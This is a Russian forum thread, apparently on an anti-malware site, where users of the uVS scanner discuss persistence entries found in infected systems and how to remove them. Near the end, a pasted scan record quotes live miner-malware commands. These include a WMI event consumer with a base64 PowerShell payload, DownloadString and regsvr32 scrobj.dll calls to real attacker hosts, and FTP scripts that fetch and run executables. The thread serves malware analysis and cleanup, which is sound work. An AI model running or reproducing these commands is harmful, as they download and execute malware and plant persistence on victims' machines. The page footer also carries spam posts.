Перейти к содержанию

Recommended Posts

PR55.RP55

 Windows 10 Pro x64 (NT v10.0 SP0) build 15063  [C:\WINDOWS]

-----------------------

Полное имя                  {6\[CLSID]
Имя файла                   [CLSID]
Тек. статус                 в автозапуске
                            
Сохраненная информация      на момент создания образа
Статус                      в автозапуске
                            
Ссылки на объект            
Ссылка                      HKLM\Software\Classes\Wow6432Node\CLSID\{083863F1-70DE-11d0-BD40-00A0C911CE86}\Instance\{60BD49A6-240E-48ef-8D73-AC8244BE1D85}\CLSID
------------------------

Полное имя                  {E\[CLSID]
Имя файла                   [CLSID]
Тек. статус                 в автозапуске
                            
Сохраненная информация      на момент создания образа
Статус                      в автозапуске
                            
Ссылки на объект            
Ссылка                      HKLM\Software\Classes\Wow6432Node\CLSID\{083863F1-70DE-11d0-BD40-00A0C911CE86}\Instance\{EAC2F030-5937-414C-9B7A-6B57F7C072E8}\CLSID

------------------------

Тема\образ.

http://www.tehnari.ru/f35/t262097/

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
demkd
7 часов назад, PR55.RP55 сказал:

{6\[CLSID]

содержимое ключа нужно, без него не починить.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
PR55.RP55

Такая вот история.

 

 

2018-12-13.jpg

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
demkd
33 минут назад, PR55.RP55 сказал:

Такая вот история.

и что не так?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
PR55.RP55
11 часов назад, demkd сказал:

и что не так? 

Почему  в списке два процесса uVS - ?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
demkd
2 часа назад, PR55.RP55 сказал:

Почему  в списке два процесса uVS - ?

Windows 64-х битный потому и 2 процесса, один под эмулятором, второй 64-х битный.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
santy
Цитата

Добавлена поддержка WMI классов на базе __TimerInstruction.

судя по свежему образу, видится запись в WMI

Полное имя                  WMI:\\.\ROOT\SUBSCRIPTION\__INTERVALTIMERINSTRUCTION\FUCKYOUMM2_ITIMER
Имя файла                   FUCKYOUMM2_ITIMER
Тек. статус                 в автозапуске
                            
Сохраненная информация      на момент создания образа
Статус                      в автозапуске
                            
Namespace                   \\.\root\subscription
Consumer_Class              __IntervalTimerInstruction
TimerId                     fuckyoumm2_itimer
IntervalBetweenEvents       10800000
SkipIfPassed                FALSE

                           

ANDREY-PC_2018-12-20_09-32-21_v4.1.2.7z

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
PR55.RP55
В 21.12.2018 at 8:28 AM, santy сказал:

Добавлена поддержка WMI классов на базе __TimerInstruction.

И здесь:  http://www.tehnari.ru/f183/t262393/

Сразу две записи:

Полное имя                  WMI:\\.\ROOT\SUBSCRIPTION\__INTERVALTIMERINSTRUCTION\SETHOMEPAGE INTERVAL TIMER
Имя файла                   SETHOMEPAGE INTERVAL TIMER
Тек. статус                   в автозапуске
Сохраненная информация      на момент создания образа
Статус                      в автозапуске
                            
Namespace                   \\.\root\subscription
Consumer_Class              __IntervalTimerInstruction
TimerId                     SethomePage Interval Timer
IntervalBetweenEvents       900000
SkipIfPassed                FALSE

--------------------

+

.[EVENTFILTER SETHOMEPAGE2]

                            

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
PR55.RP55

+

А здесь...

Тема\образ: http://www.tehnari.ru/f35/t262401/

------------------

Записи:

FILE:///C:\PROGRAM FILES (X86)\HEWLETT-PACKARD\HP SUPPORT SOLUTIONS\MODULES\ACLMCONTROL.EXE

C:\PROGRAM FILES (X86)\HEWLETT-PACKARD\HP SUPPORT SOLUTIONS\MODULES\ACLMCONTROL.EXE

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
PR55.RP55

Тема: http://www.tehnari.ru/f35/t262401/

uVS  видит запись: 

Ссылка                      HKEY_USERS\S-1-5-21-3928128571-3472622639-2727322988-1000\Software\Microsoft\Windows\CurrentVersion\Run\Vladislav
Vladislav                   cmd.exe /c start www.dipladoks.org

------------
Но в автоскрипте не будет нормального удаления.

По хорошему не должно быть никаких дополнительных команд.

Только:  delref

Если команда отдана - то автоматически удаляются и всё задачи где есть запись: www.dipladoks.org

И всё, что есть в автозапуске по:   www.dipladoks.org  и т.д.

 

 

 

 

 

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
santy
8 часов назад, PR55.RP55 сказал:

Но в автоскрипте не будет нормального удаления.

по этому образу в автоскрипте будут две команды:

delref HTTP://WWW.DIPLADOKS.ORG/
delref WWW.DIPLADOKS.ORG

вторая команда должна зачистить все ссылки и задачи, которые приведены в этом объекте

 

Цитата

Полное имя                  WWW.DIPLADOKS.ORG
Имя файла                   WWW.DIPLADOKS.ORG
Тек. статус                 ?ВИРУС? ПОДОЗРИТЕЛЬНЫЙ в автозапуске
                            
Удовлетворяет критериям     
RUN                         (ССЫЛКА ~ \CURRENTVERSION\RUN\)(1)   AND   (ЦИФР. ПОДПИСЬ !~ ДЕЙСТВИТЕЛЬНА)(1) [auto (0)]
RUN.CMD                     (ССЫЛКА ~ \CURRENTVERSION\RUN\)(1)   AND   ( ~ CMD.EXE)(1) [auto (0)]
KB-RIBAKI.ORG               ( ~ REG ADD)(1) [auto (0)]
                            
Сохраненная информация      на момент создания образа
Статус                      в автозапуске
                            
Доп. информация             на момент обновления списка
Файл                        C:\WINDOWS\SYSTEM32\CMD.EXE
CmdLine                     /C REG ADD HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN /F /V VLADISLAV /T REG_SZ /D "CMD.EXE /C START WWW.DIPLADOKS.ORG"
                            
Ссылки на объект            
Ссылка                      C:\WINDOWS\SYSTEM32\TASKS\VLADISLAV
                            
Ссылка                      HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{A3E456D9-DFF9-4644-90AD-00597EAAA099}\Actions
Actions                     "cmd.exe" /c REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /f /v Vladislav /t REG_SZ /d "cmd.exe /c start www.dipladoks.org"
                            
Ссылка                      HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Boot\{A3E456D9-DFF9-4644-90AD-00597EAAA099}\
                            
Ссылка                      HKEY_USERS\S-1-5-21-3928128571-3472622639-2727322988-1000\Software\Microsoft\Windows\CurrentVersion\Run\Vladislav
Vladislav                   cmd.exe /c start www.dipladoks.org


                            

 

 

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
PR55.RP55
В 08.01.2019 at 8:32 AM, santy сказал:

вторая команда должна зачистить все ссылки и задачи, которые приведены в этом объекте

Может и должна.

В теме были применены две команды:

deltsk WWW.DIPLADOKS.ORG

delref HTTP://WWW.DIPLADOKS.ORG/

Но, как мы видим в FRST после этого осталась запись:

HKU\S-1-5-21-3928128571-3472622639-2727322988-1000\...\Run: [Vladislav] => cmd.exe /c start www.dipladoks.org

--------------

"HKU\S-1-5-21-3928128571-3472622639-2727322988-1000\Software\Microsoft\Windows\CurrentVersion\Run\\Vladislav" => removed successfully

------

Цитата

 4.0.21
---------------------------------------------------------
o Добавлена возможность удалять события WMI и задачи без удаления всех ссылок на файл/объект.
Скриптовые команды: delwmi и deltsk

Исходя из этой логики команда: deltsk  не удаляет ссылки.

В 07.01.2019 at 11:48 PM, PR55.RP55 сказал:

По хорошему не должно быть никаких дополнительных команд.

Только:  delref

Если команда отдана - то автоматически удаляются и всё задачи где есть запись: www.dipladoks.org

И всё, что есть в автозапуске по:   www.dipladoks.org  и т.д.

 

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
santy

если deltsk будет удалять и задачи, связанные с данным объектом и все ссылки в реестре на объект, тогда зачем нужен дубль команды, когда все это умеет делать delref.

значит, эта команда (deltsk) введена для того чтобы удалить только задачи, связанные с объектом автозапуска. Например, сам объект автозапуска может быть даже с белой цифровой записью и содержит ряд полезных ссылок в реестре, которые необходимы для функционирования системы, но в тоже время может быть использован через левую задачу для деструктивных действий. Поэтому, в данном случае мы не можем применить delref к объекту, а только deltsk. (Очевидно, при этом будут удалены все задачи, связанные с данным объектом). Если необходимо удалить связанные с объектом задачи  поштучно, в этом случае можно использовать контекстное удаление из info, например: del %Sys32%\TASKS\VLADISLAV, del %Sys32%\TASKS\VLADISLAV1, del %Sys32%\TASKS\VLADISLAV2

 

команда deltsk WWW.DIPLADOKS.ORG скорее всего была применена без внимания, что в автозапуске остался еще запуск по данной ссылке через ключ реестра.

 

 

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
PR55.RP55

santy

Я говорю об удалении не всего, а только самой записи: www.dipladoks.org

т.е. удаляется фрагмент\часть при 100% совпадении\соответствии.

В данном случае удалению подлежит:  www.dipladoks.org

HKU\S-1-5-21-3928128571-3472622639-2727322988-1000\...\Run: [Vladislav] => cmd.exe /c start www.dipladoks.org

В итоге получим:

HKU\S-1-5-21-3928128571-3472622639-2727322988-1000\...\Run: [Vladislav] => cmd.exe /c start

-----------

И в конце скрипта у нас идёт команда на удаление ссылок... удаляем отсутствующие объекты.

Что уже давно проверено и безопасно и не будет затрагивать полезные ссылки в реестре.

-----------

Проблема в том, что оператор не видит всей картины.

Если бы была возможность создать поисковый запрос по всему Инфо.

тогда оператор бы увидел все записи в _одном окне:

Цитата

Полное имя                  HTTP://WWW.DIPLADOKS.ORG/
Имя файла                   HTTP://WWW.DIPLADOKS.ORG/
CmdLine                     "C:\Program Files (x86)\Opera\57.0.3098.106\opera.exe" -noautoupdate --ran-launcher -- http://www.dipladoks.org/

 


Полное имя                  WWW.DIPLADOKS.ORG
Имя файла                   WWW.DIPLADOKS.ORG
CmdLine                     /C REG ADD HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN /F /V VLADISLAV /T REG_SZ /D "CMD.EXE /C START WWW.DIPLADOKS.ORG"
Actions                     "cmd.exe" /c REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /f /v Vladislav /t REG_SZ /d "cmd.exe /c start www.dipladoks.org"
Vladislav                   cmd.exe /c start www.dipladoks.org


CmdLine                     "C:\Program Files (x86)\Opera\57.0.3098.106\opera.exe" -noautoupdate --ran-launcher -- http://www.dipladoks.org/

 


CmdLine                     /C REG ADD HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN /F /V VLADISLAV /T REG_SZ /D "CMD.EXE /C START WWW.DIPLADOKS.ORG"
CmdLine                     /C REG ADD HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN /F /V VLADISLAV /T REG_SZ /D "CMD.EXE /C START WWW.DIPLADOKS.ORG"
Actions                     "cmd.exe" /c REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /f /v Vladislav /t REG_SZ /d "cmd.exe /c start www.dipladoks.org"
Actions                     "cmd.exe" /c REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /f /v Vladislav /t REG_SZ /d "cmd.exe /c start www.dipladoks.org"
Vladislav                   cmd.exe /c start www.dipladoks.org

 

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
santy

RP55,

ничто не мешает оператору заглянуть внутрь инфо подозрительных объектов чтобы определиться какой командой лучше его зачистить из системы. или delall, или delref, или deltsk или достаточно просто использовать del,

достаточно при этом использовать фильтрующее выражение и обе записи окажутся рядом.
 

Цитата

 

Если бы была возможность создать поисковый запрос по всему Инфо.

тогда оператор бы увидел все записи в _одном окне:

 

а вот каша из строк инфо, которые принадлежат разным объектам не нужна.

отсутствие привязки этих строк к реальному объекту автозапуска из списка только затруднит выбор команды.

скажем, тот же объект в cmdline может быть запущен из lnk файла, и вместо очистки командной строки в ярлыках будет запущено удаление ярлыков.

---------

внутри info возможно фильтр не помешал бы, в тех случаях, когда на странице info большой объем информации задан

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
PR55.RP55
В 08.01.2019 at 4:29 PM, santy сказал:

каша из строк инфо, которые принадлежат разным объектам не нужна.

Что мешает создать переход к нужному объекту ?

Выполнили поиск > посмотрели информацию > переход к нужному объекту и на месте приняли решение.

Или создать суммирующее окно Инфо. где будут все объекты и все ссылки удовлетворяющие запросу.

С выделением результата поиска.

В 08.01.2019 at 4:29 PM, santy сказал:

внутри info возможно фильтр не помешал бы, в тех случаях, когда на странице info большой объем информации задан

Давно нужно сделать.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
santy
В 08.01.2019 at 5:52 PM, PR55.RP55 сказал:

santy

Я говорю об удалении не всего, а только самой записи: www.dipladoks.org

т.е. удаляется фрагмент\часть при 100% совпадении\соответствии.

В данном случае удалению подлежит:  www.dipladoks.org

HKU\S-1-5-21-3928128571-3472622639-2727322988-1000\...\Run: [Vladislav] => cmd.exe /c start www.dipladoks.org

В итоге получим:

HKU\S-1-5-21-3928128571-3472622639-2727322988-1000\...\Run: [Vladislav] => cmd.exe /c start

-----------

И в конце скрипта у нас идёт команда на удаление ссылок... удаляем отсутствующие объекты.

Что уже давно проверено и безопасно и не будет затрагивать полезные ссылки в реестре.

ну, в данной строке HKU\S-1-5-21-3928128571-3472622639-2727322988-1000\...\Run: [Vladislav] => cmd.exe /c start есть объекты, которые присутствуют в системе, поэтому вряд ли эта строка попадет под удаление отсутствующих объектов. в итоге, у юзера будет все время впустую стартовать cmd.exe, или браузер, или запускаться командное окно и .т.п.

Частичное исправление параметров (без удаления ключа), если необходимо, решается сейчас твиками. например: regt 12

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
PR55.RP55

santy

Мне кажется, что идея с удалением фрагмента\части интересная.

Единственно нужен такой метод при котором операция не будет приводить к негативным последствиям в виде старта cmd.exe, браузера, командных окон и т.д.

твик regt 12 - команда возвращает запись в исходное значение...

Значит сопоставив две записи:

1) Запись модифицированная

2) Исходная запись - которая сейчас содержится в твике.

3) Получаем разницу.

4) Эту разницу программа и обрабатывает.

-----------

Нужен банк\база стандартных\регулярных исходных значений и отталкиваясь от этого и обработать объект.

8 часов назад, santy сказал:

будет все время впустую стартовать cmd.exe, или браузер, или запускаться командное окно и .т.п.

Или выявлять и удалять эти пустые\битые элементы. Что вроде бы и так реализовано.

 

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
santy
13 минут назад, PR55.RP55 сказал:

Мне кажется, что идея с удалением фрагмента\части интересная.

может и интересная,

но в данном случае идея с очисткой ссылок и задач, реализованная в программе работает.

командная строка (cmdline), которая может содержать чистые файлы (cmd.exe, wmic.exe, regsvr32.exe, explorer.exe и т.д., через которые могут быть выполнены деструктивные действия), разбивается на отдельные элементы списка автозапуска, и каждый элемент, который был выделен из командной строки, содержит всю инфо, из которой он был выделен. Т.о. если применяется delref к этим элементам, то удаляются из реестра или из tasks все параметры, ключи и actions запуска деструктивного действия.

При этом, сам чистый файл не затрагивается,  не удаляется, а удаляется только его деструктивное применение, прописанное через задачи, или ключи реестра.

 

 

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
santy

demkd,

а здеcь странный получился разбор, хотя случай все тот же: Dark.Galaxy &miner хотя и посвежее случай.

;uVS v4.1.2 [http://dsrt.dyndns.org] [Windows 6.1.7601 SP1 Service Pack 1]
; WMI: обработчики событий

Цитата

 

ПОДОЗРИТ.  | хттп]://173.208.139.170/2.TXT
ПОДОЗРИТ.  | хттп://35.182.171.137/3.TXT
ПОДОЗРИТ.  | хттп://WMI.1217BYE.HOST/1.TXT
ПОДОЗРИТ.  | SYSTEM.NET.WEBCLIENT).DOWNLOADSTRING('хттп://173.208.139.170/S.TXT')&POWERSHELL.EXE
ПОДОЗРИТ.  | SYSTEM.NET.WEBCLIENT).DOWNLOADSTRING('хттп://35.182.171.137/S.JPG')||REGSVR32
ПОДОЗРИТ.  | SYSTEM.NET.WEBCLIENT).DOWNLOADSTRING('хттп://WMI.1217BYE.HOST/S.PS1')&POWERSHELL.EXE
автозапуск | &POWERSHELL.EXE
автозапуск | C:\WINDOWS\SYSTEM32\CSCRIPT.EXE
автозапуск | KERNCAP.VBS
автозапуск | WMI:\\.\ROOT\SUBSCRIPTION\NTEVENTLOGEVENTCONSUMER\SCM EVENT LOG CONSUMER.[SCM EVENT LOG FILTER]
автозапуск | C:\WINDOWS\SYSTEM32\SCROBJ.DLL


 

 

АЛЕКСЕЙ-HP_2019-01-11_21-19-41_v4.1.2.7z

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
demkd
1 час назад, santy сказал:

а здеcь странный получился разбор, хотя случай все тот же: Dark.Galaxy &miner хотя и посвежее случай.

разобрать все многообразие командных строк просто невозможно, мусор всегда будет

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
santy

похоже, какой-то новый подход используется, с комбинированием base64 и реального кода.

consumer_name fuckyoumm4 и consumer_filter fuckyoumm3 засветились в инфо cmd.exe

 

Цитата

 

Полное имя                  C:\WINDOWS\SYSTEM32\CMD.EXE
Имя файла                   CMD.EXE
Тек. статус                 АКТИВНЫЙ ИЗВЕСТНЫЙ ПРОВЕРЕННЫЙ в автозапуске [Запускался неявно или вручную]
                            
Удовлетворяет критериям     
WMI_ACTIVESCRIPTEVENTCONSUMER.LIST(CONSUMER_NAME ~ FUCKYOUMM)(1) [delall (0)]
TASK.MUSA                   (ССЫЛКА ~ TASKS\MYSA)(1) [auto (0)]
                            
Сохраненная информация      на момент создания образа
Статус                      АКТИВНЫЙ ИЗВЕСТНЫЙ ПРОВЕРЕННЫЙ в автозапуске [Запускался неявно или вручную]
Процесс                     64-х битный
File_Id                     4CE798E559000
Linker                      9.0
Размер                      345088 байт
Создан                      21.11.2010 в 06:23:55
Изменен                     21.11.2010 в 06:23:55
                            
TimeStamp                   20.11.2010 в 09:46:13
EntryPoint                  +
OS Version                  0.1
Subsystem                   Windows character-mode user interface (CUI) subsystem
IMAGE_FILE_DLL              -
IMAGE_FILE_EXECUTABLE_IMAGE +
Тип файла                   64-х битный ИСПОЛНЯЕМЫЙ
Цифр. подпись               Действительна, подписано Microsoft Windows
                            
Оригинальное имя            Cmd.Exe.MUI
Версия файла                6.1.7601.17514 (win7sp1_rtm.101119-1850)
Описание                    Обработчик команд Windows
Производитель               Microsoft Corporation
                            
Доп. информация             на момент обновления списка
pid = 1708                  Алексей-HP\Алексей
CmdLine                     "C:\Windows\System32\cmd.exe" /c "color 17 & title AutorunsVTchecker & "C:\Users\CD86~1\AppData\Local\Temp\7ZipSfx.000\autorunsc64.exe" -accepteula -a * -vt -vs"
Процесс создан              21:17:13 [2019.01.11]
С момента создания          00:02:35
CPU                         0,01%
CPU (1 core)                0,01%
parentid = 3136             
pid = 1900                  NT AUTHORITY\система
CmdLine                     C:\Windows\system32\cmd.EXE /c echo open ftp.1226bye.xyz>ps&echo test>>ps&echo 1433>>ps&echo get s.rar c:\windows\help\lsmosee.exe>>ps&echo bye>>ps&ftp -s:ps&c:\windows\help\lsmosee.exe
Процесс создан              21:06:50 [2019.01.11]
С момента создания          00:12:58
CPU                         0,00%
CPU (1 core)                0,00%
parentid = 1620             C:\WINDOWS\SYSTEM32\TASKENG.EXE
CmdLine                     /C ECHO OPEN FTP.1226BYE.XYZ>S&ECHO TEST>>S&ECHO 1433>>S&ECHO BINARY>>S&ECHO GET A.EXE C:\WINDOWS\UPDATE.EXE>>S&ECHO BYE>>S&FTP -S:S&C:\WINDOWS\UPDATE.EXE
CmdLine                     /C ECHO OPEN FTP.1226BYE.XYZ>P&ECHO TEST>>P&ECHO 1433>>P&ECHO GET S.DAT C:\WINDOWS\DEBUG\ITEM.DAT>>P&ECHO BYE>>P&FTP -S:P
CmdLine                     /C ECHO OPEN FTP.1226BYE.XYZ>PS&ECHO TEST>>PS&ECHO 1433>>PS&ECHO GET S.RAR C:\WINDOWS\HELP\LSMOSEE.EXE>>PS&ECHO BYE>>PS&FTP -S:PS&C:\WINDOWS\HELP\LSMOSEE.EXE
SHA1                        0F3C4FF28F354AEDE202D54E9D1C5529A3BF87D8
MD5                         5746BD7E255DD6A8AFA06F7C42C1BA41
                            
Namespace                   \\.\root\subscription
Consumer_Name               fuckyoumm4
Consumer_Class              CommandLineEventConsumer
Consumer_CommandLineTemplatecmd /c powershell.exe -nop -enc "JAB3AGMAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdwBtAGkALgAxADIAMQA3AGIAeQBlAC4AaABvAHMAdAAvADIALgB0AHgAdAAnACkALgB0AHIAaQBtACgAKQAgAC0AcwBwAGwAaQB0ACAAJwBbAFwAcgBcAG4AXQArACcAfAAlAHsAJABuAD0AJABfAC4AcwBwAGwAaQB0ACgAJwAvACcAKQBbAC0AMQBdADsAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAXwAsACAAJABuACkAOwBzAHQAYQByAHQAIAAkAG4AOwB9AA=="&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://wmi.1217bye.host/S.ps1')&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://173.208.139.170/s.txt')&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://35.182.171.137/s.jpg')||regsvr32 /u /s /i:http://wmi.1217bye.host/1.txt scrobj.dll&regsvr32 /u /s /i:http://173.208.139.170/2.txt scrobj.dll&regsvr32 /u /s /i:http://35.182.171.137/3.txt scrobj.dll
Filter_Name                 fuckyoumm3
Filter_Class                __EventFilter
Filter_Query                SELECT * FROM __InstanceModificationEvent WITHIN 10800 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'
#MOF_Bind#                  
instance of __FilterToConsumerBinding
{
    Consumer = "CommandLineEventConsumer.Name=\"fuckyoumm4\"";
    Filter = "__EventFilter.Name=\"fuckyoumm3\"";
};

#MOF_Event#                 
instance of __EventFilter
{
    EventNamespace = "root\\cimv2";
    Name = "fuckyoumm3";
    Query = "SELECT * FROM __InstanceModificationEvent WITHIN 10800 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'";
    QueryLanguage = "WQL";
};

#MOF_Consumer#              
instance of CommandLineEventConsumer
{
    CommandLineTemplate = "cmd /c powershell.exe -nop -enc \"JAB3AGMAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdwBtAGkALgAxADIAMQA3AGIAeQBlAC4AaABvAHMAdAAvADIALgB0AHgAdAAnACkALgB0AHIAaQBtACgAKQAgAC0AcwBwAGwAaQB0ACAAJwBbAFwAcgBcAG4AXQArACcAfAAlAHsAJABuAD0AJABfAC4AcwBwAGwAaQB0ACgAJwAvACcAKQBbAC0AMQBdADsAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAXwAsACAAJABuACkAOwBzAHQAYQByAHQAIAAkAG4AOwB9AA==\"&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://wmi.1217bye.host/S.ps1')&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://173.208.139.170/s.txt')&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://35.182.171.137/s.jpg')||regsvr32 /u /s /i:http://wmi.1217bye.host/1.txt scrobj.dll&regsvr32 /u /s /i:http://173.208.139.170/2.txt scrobj.dll&regsvr32 /u /s /i:http://35.182.171.137/3.txt scrobj.dll";
    Name = "fuckyoumm4";
};

                            
Ссылки на объект            
Ссылка                      C:\WINDOWS\SYSTEM32\TASKS\MYSA
                            
Ссылка                      C:\WINDOWS\SYSTEM32\TASKS\MYSA2
                            
Ссылка                      C:\WINDOWS\SYSTEM32\TASKS\MYSA3
                           

 

 

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
demkd
26 минут назад, santy сказал:

похоже, какой-то новый подход используется, с комбинированием base64 и реального кода.

в принципе ничего нового, просто затрудняет машинный анализ вот и все, возможно есть смысл отдельно обрабатывать powershell и следить за его командной строкой если -enc то как то это выделять

 

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
santy
42 минут назад, demkd сказал:

возможно есть смысл отдельно обрабатывать powershell и следить за его командной строкой если -enc то как то это выделять

а что здесь означает ключ -enc? закодированный объект?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
PR55.RP55

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Создайте учетную запись или войдите, чтобы комментировать

Вы должны быть пользователем, чтобы оставить комментарий

Создать учетную запись

Зарегистрируйте новую учётную запись в нашем сообществе. Это очень просто!

Регистрация нового пользователя

Войти

Уже есть аккаунт? Войти в систему.

Войти

  • Сообщения

    • kristina
      Привет! Интересует вопрос подсчета реального траффика для сайта - кто может порекоммендовать хороший и недорогой инструмент? Нужно посчитать реальный трафик сайта казино https://www.lovevulkan.ru/
    • 6Gleb6
      Да, не на большой и не большую сумму денег. Хотя, есть варианты с беспроцентным займом, как вот здесь https://zaymon.com.ua/ много компаний предлагают. Сам правда не брал, но скорее всего все должно быть честно. Суммы там небольшие, а конкуренция сейчас между МФО огромная. Вот и дают первый займ под 0% чтобы завлечь клиентов.
    • demkd
      Пришлось таки выпустить новую версию, заодно пополнил main. ---------------------------------------------------------  4.1.3
      ---------------------------------------------------------
       o Исправлен модуль startf, он не мог правильно определять версию Windows 10.  
    • AM_Bot
      Утилита Avast Driver Updater позволяет автоматизировать регулярное обновление аппаратных драйверов для поддержания операционной системы Windows в стабильном состоянии. Avast Driver Updater проверяет обновления в реальном времени по онлайн-базе 500 000 драйверов и делает регулярные обновления простыми для пользователей. ВведениеФункциональные возможности Avast Driver UpdaterСистемные требования Avast Driver UpdaterУстановка и активацияРабота с Avast Driver Updater5.1. Сканирование5.2. Обновление5.3. Безопасность использования системы5.4. Создание резервных копий и восстановление драйверовВыводы ВведениеВо многих случаях аварийные отказы операционной системы происходят из-за ошибок в драйверах устройств. Устаревшие или отсутствующие драйверы способны вызвать массу проблем в работоспособности системы — от замедления скорости работы программного обеспечения до проблем совместимости оборудования и постоянного вылета в синий экран смерти (BSOD). Хотя производители аппаратуры регулярно выпускают обновления, которые позволяют использовать возможности компьютера более эффективно, многие пользователи не знают о них и годами пользуются устаревшими драйверами, смиряясь с ошибками системы. Кроме того, в регулярных обновлениях нуждаются и безошибочно работающие драйверы для обеспечения совместимости с новыми модификациями операционной системы и смежным оборудованием.Avast Driver Updater призван решить проблему регулярного обновления драйверов оборудования для операционной системы Windows. В базе утилиты более 500 000 драйверов — этого достаточно для поддержания актуальности не только популярных аудио- и видеокарт, микрофонов и принтеров, но и для исправления ошибок совместимости при использовании старых компьютеров. Функциональные возможности Avast Driver UpdaterAvast Driver Updater сканирует реестр Windows для определения конфигурации системы и необходимых для стабильной работы драйверов. В перечень определяемого оборудования входят принтеры, сканеры, цифровые камеры, видео- и сетевые адаптеры, а также звуковые и графические процессоры, устройства ввода, запоминающие устройства и их контроллеры, системные устройства и другие элементы системы.Ключевые функции Avast Driver Updater — это поиск последних версий драйверов для оборудования и их автоматическое обновление. Утилита также предложит обновить поврежденные или установить отсутствующие драйверы. Системные требования Avast Driver UpdaterAvast Driver Updater не требователен к ресурсам и будет работать практически на любом оборудовании. Вот минимальные требования, заявленные производителем: Windows XP/Vista/7/8/10 с последними пакетами обновлений (кроме версий Starter, RT, Mobile и IoT) базовая (32- или 64-разрядная версия);компьютер с процессором Intel Pentium 4 или AMD Athlon 64 (либо новее; необходима поддержка инструкций SSE2);256 МБ ОЗУ (или более);400 МБ свободного пространства на жестком диске;соединение с интернетом для загрузки, активации и обновления программы. Установка и активация Avast Driver UpdaterДля загрузки и активации программы требуется 400 МБ свободного пространства на жестком диске и соединение с интернетом. Разработчик предоставляет два варианта лицензии — бесплатная, только для проверки драйверов, и полная — с автоматической проверкой и возможностью установки обновлений. Стоимость полной версии на момент написания обзора — 850 р/год.Также утилиту можно установить в комплекте с Avast Antivirus. Работа с Avast Driver UpdaterПрограмма очень простая в использовании благодаря русскоязычному интерфейсу, который шаг за шагом ведет пользователя. При первом запуске Avast Driver Updater распознает оборудование и параметры системы. Прежде всего программа предложит запустить сканирование, чтобы автоматически выявить отсутствующие, неподходящие или устаревшие драйверы (рис. 1). Рисунок 1. Сканирование системы в Avast Driver Updater Среди других функций Avast Driver Updater предлагает резервное копирование и восстановление драйверов, а также автоматический и запланированный поиск драйверов в определенное время или с определенной частотой.СканированиеПроцесс сканирования системы занимает несколько секунд. В результате сканирования Avast Driver Updater визуализирует актуальность драйверов в виде таблицы. Кроме того, программа сразу показывает список проблемных драйверов, в котором можно выбрать, какие необходимо обновить. К сожалению, программа не предоставляет информации о дате выпуска обновляемого драйвера. Скачать выбранные драйверы можно вручную по одному, либо отметить несколько для автоматического скачивания и обновления (рис. 2). Подсказок о критичности обновления каждого конкретного драйвера программа также не дает. Рисунок 2. Результаты сканирования в Avast Driver Updater  На этом этапе программа предложит ввести лицензионный ключ, чтобы скачать обновления. Пробная версия не позволяет скачать рекомендуемые драйверы через интерфейс программы (рис. 3). Рисунок 3. Активация программы Avast Driver Updater  Настроить периодическое сканирование можно в разделе Параметры ▸Планирование (рис. 4). Программа способна автоматически проверять наличие обновлений драйверов по выбранному расписанию — ежедневно или еженедельно. Рисунок 4. 